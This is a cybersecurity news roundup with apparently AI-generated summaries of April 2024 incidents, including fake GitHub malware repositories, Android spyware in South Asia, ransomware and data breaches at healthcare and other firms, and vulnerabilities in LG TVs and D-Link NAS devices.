Threat actors are exploiting GitHub’s search functionality to trick users into downloading malware by creating fake repositories with popular names and topics. The attackers manipulate search rankings and use techniques like fake stars to deceive developers into downloading malicious code concealed within Microsoft Visual Code project files. This underscores the importance of developers exercising caution when downloading from open-source repositories and not solely relying on reputation as a metric for trustworthiness.

‘eXotic Visit’ Spyware Campaign Targets Android Users in India and Pakistan

The eXotic Visit spyware campaign is actively targeting Android users in India and Pakistan, distributing malware through dedicated websites and the Google Play Store. The campaign, ongoing since November 2021, is highly targeted and involves fake-but-functional apps masquerading as messaging services and other legitimate services. The malware, XploitSPY RAT, is capable of gathering sensitive data from infected devices and employs various tactics to evade detection, with the main purpose being espionage in South Asia.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

Wells Fargo experienced a data breach affecting customer names and mortgage account numbers, with unclear details on the breach’s timing or duration. The bank responded promptly, taking undisclosed actions against an implicated employee and enhancing monitoring and security measures to prevent future incidents. This event adds to the growing list of cybersecurity issues facing major US banks.

Ransomware Gang Stole the Health Data of 533,000 People

A ransomware gang breached the network of Group Health Cooperative of South Central Wisconsin (GHC-SCW) in January, stealing personal and medical information of over 500,000 individuals. The attackers were unable to encrypt the compromised devices, allowing GHC-SCW to secure its systems with the help of cyber incident response experts. The BlackSuit ransomware gang claimed responsibility for the attack, which included stolen health data, financial information, and business contracts.

DOJ-Collected Information Exposed in Data Breach Affecting 340,000

Greylock McKinnon Associates, Inc. reported a breach compromising personal and Medicare information of over 340,000 individuals, originally collected for the US Department of Justice for a civil litigation matter. The breach, detected in May 2023, took months to assess, leading to the offer of credit monitoring services for affected individuals. This incident underscores the significant impact of data breaches on privacy and the lengthy process of incident response and notification.

Change Healthcare Hit By Cyber Extortion Again

Change Healthcare, a UnitedHealth Group subsidiary, faces renewed extortion from cybercriminals just a month after paying a ransom to prevent data release from a February 2024 ransomware attack by the ALPHV/BlackCat gang. The new RansomHub group, possibly with former BlackCat affiliates, threatens to expose stolen data unless another ransom is paid. Cybersecurity experts warn of the risks of double extortion schemes and emphasize that paying a ransom does not guarantee decryption or system access restoration.

Cyberattack Disrupts Targus Business Operations

Targus, laptop and mobile accessories firm, experienced a cyberattack disrupting operations, following unauthorized access to its file systems on April 5th, 2024. The company, backed by B. Riley Financial, responded with immediate containment and recovery efforts, indicating the incident should not materially affect its financial outlook. The breach’s specifics, including the perpetrator, remain unclear, highlighting the ongoing challenges businesses face in cybersecurity management.

Canadian Online Vehicle Dealer EBlock Hit By Cyberattack

EBlock, a Canadian online vehicle auction company, experienced a cyberattack affecting its ABS Auto Auctions infrastructure, compromising personal data including social security numbers and bank details. The company responded by securing the compromised systems and launching an investigation, while also offering affected customers a year of free identity monitoring services. This incident highlights the vulnerability of digital platforms to unauthorized access and the importance of robust cybersecurity measures.

Over 90,000 LG Smart TVs May Be Exposed to Remote Attacks

Bitdefender researchers discovered four vulnerabilities in LG Smart TVs running WebOS, allowing unauthorized access and control, including authorization bypasses and command injections. Over 90,000 exposed devices were found vulnerable to these flaws. LG released security updates in March 2024, urging users to apply them to prevent potential remote attacks and protect against exploitation for malicious activities like DDoS attacks or cryptomining.

92,000 D-Link NAS Devices Open to Critical Command-Injection Bug

A critical flaw in end-of-life models of D-Link NAS devices allows attackers to backdoor the devices and access sensitive information. More than 92,000 devices connected to the Internet are affected by the flaw, which involves a backdoor and command injection leading to remote code execution. With no patch available, D-Link advises users to retire and replace the affected devices immediately to prevent unauthorized access and potential data theft.

Microsoft April 2024 Patch Tuesday Fixes 150 Security Flaws, 67 RCEs

Microsoft’s April 2024 Patch Tuesday addressed 150 security flaws, including 67 remote code execution vulnerabilities, with a focus on Microsoft SQL drivers. Notably, no zero-day vulnerabilities were fixed, but researchers from Varonis disclosed two zero-days affecting Microsoft SharePoint, enabling file exfiltration techniques. These SharePoint vulnerabilities have not been assigned CVEs and are awaiting patching.

Parental Control App KidSecurity Exposes Live GPS Locations of Kids on the Internet

The parental control app KidSecurity suffered a significant data breach, exposing children’s GPS locations and private messages due to improperly secured data streams. Over a million users’ sensitive information, including social media interactions and device details, was accessible online for over a year. This marks the second security failure for KidSecurity, raising serious concerns about the app’s data protection practices.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.